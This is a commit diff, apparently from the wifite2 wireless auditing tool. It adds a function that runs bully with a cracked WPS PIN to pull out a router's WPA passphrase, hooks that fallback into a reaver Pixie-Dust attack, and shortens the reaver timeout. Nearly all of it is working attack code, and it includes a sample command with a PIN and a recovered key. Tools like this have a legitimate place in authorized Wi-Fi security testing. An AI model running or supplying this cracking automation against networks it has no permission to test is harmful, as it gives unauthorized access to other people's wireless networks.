Fetch PSK when reaver fails to find it using Bully
Also changed reaver --timeout from 10 seconds (default) to 4 seconds. Resolves #76
This commit is contained in:
derv82
@@ -2,12 +2,12 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
from ..model.attack import Attack
|
||||
from ..model.wps_result import CrackResultWPS
|
||||
from ..tools.airodump import Airodump
|
||||
from ..util.color import Color
|
||||
from ..util.timer import Timer
|
||||
from ..util.process import Process
|
||||
from ..config import Configuration
|
||||
from ..model.wps_result import CrackResultWPS
|
||||
|
||||
import os, time, re
|
||||
from threading import Thread
|
||||
@@ -214,7 +214,48 @@ class Bully(Attack):
|
||||
def __del__(self):
|
||||
self.stop()
|
||||
|
||||
@staticmethod
|
||||
def get_psk_from_pin(target, pin):
|
||||
'''
|
||||
bully --channel 1 --bssid 34:21:09:01:92:7C --pin 01030365 --bruteforce wlan0mon
|
||||
PIN : '01030365'
|
||||
KEY : 'password'
|
||||
BSSID : '34:21:09:01:92:7c'
|
||||
ESSID : 'AirLink89300'
|
||||
'''
|
||||
Color.pl('\n{+} found PIN: {G}%s{W}' % pin)
|
||||
Color.p('{+} fetching {C}PSK{W} using {C}bully{W}... ')
|
||||
cmd = [
|
||||
'bully',
|
||||
'--channel', target.channel,
|
||||
'--bssid', target.bssid,
|
||||
'--pin', pin,
|
||||
'--bruteforce',
|
||||
Configuration.interface
|
||||
]
|
||||
|
||||
bully_proc = Process(cmd)
|
||||
|
||||
for line in bully_proc.stderr().split('\n'):
|
||||
key_re = re.search(r"^\s*KEY\s*:\s*'(.*)'\s*$", line)
|
||||
if key_re is not None:
|
||||
psk = key_re.group(1)
|
||||
Color.pl('{W}found PSK: {G}%s{W}' % psk)
|
||||
return psk
|
||||
|
||||
Color.pl('{R}failed{W}')
|
||||
return None
|
||||
|
||||
if __name__ == '__main__':
|
||||
Configuration.initialize()
|
||||
Configuration.interface = 'wlan0mon'
|
||||
from ..model.target import Target
|
||||
fields = '34:21:09:01:92:7C,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,AirLink89300,'.split(',')
|
||||
target = Target(fields)
|
||||
psk = Bully.get_psk_from_pin(target, '01030365')
|
||||
print "psk", psk
|
||||
|
||||
'''
|
||||
stdout = " [*] Pin is '11867722', key is '9a6f7997'"
|
||||
Configuration.initialize(False)
|
||||
from ..model.target import Target
|
||||
@@ -222,3 +263,4 @@ if __name__ == '__main__':
|
||||
target = Target(fields)
|
||||
b = Bully(target)
|
||||
b.parse_line(stdout)
|
||||
'''
|
||||
|
||||
@@ -6,6 +6,7 @@ from ..config import Configuration
|
||||
from ..util.color import Color
|
||||
from ..util.process import Process
|
||||
from ..tools.airodump import Airodump
|
||||
from ..tools.bully import Bully # for PSK retrieval
|
||||
from ..model.wps_result import CrackResultWPS
|
||||
|
||||
import os, time, re
|
||||
@@ -33,6 +34,7 @@ class Reaver(Attack):
|
||||
'--bssid', self.target.bssid,
|
||||
'--channel', self.target.channel,
|
||||
'--pixie-dust', '1', # pixie-dust attack
|
||||
'--timeout', '4', # Stop waiting after 4 seconds
|
||||
#'--delay', '0',
|
||||
#'--no-nacks',
|
||||
'--session', '/dev/null', # Don't restart session
|
||||
@@ -80,9 +82,17 @@ class Reaver(Attack):
|
||||
# Check if we cracked it.
|
||||
if pin is not None:
|
||||
# We cracked it.
|
||||
|
||||
if psk is None:
|
||||
# Try to derive PSK from PIN using Bully
|
||||
psk = Bully.get_psk_from_pin(self.target, pin)
|
||||
|
||||
bssid = self.target.bssid
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
|
||||
if psk is None:
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN{W} (but not PSK)")
|
||||
else:
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
|
||||
Color.pl("")
|
||||
self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)
|
||||
self.crack_result.dump()
|
||||
|
||||
Reference in New Issue
Block a user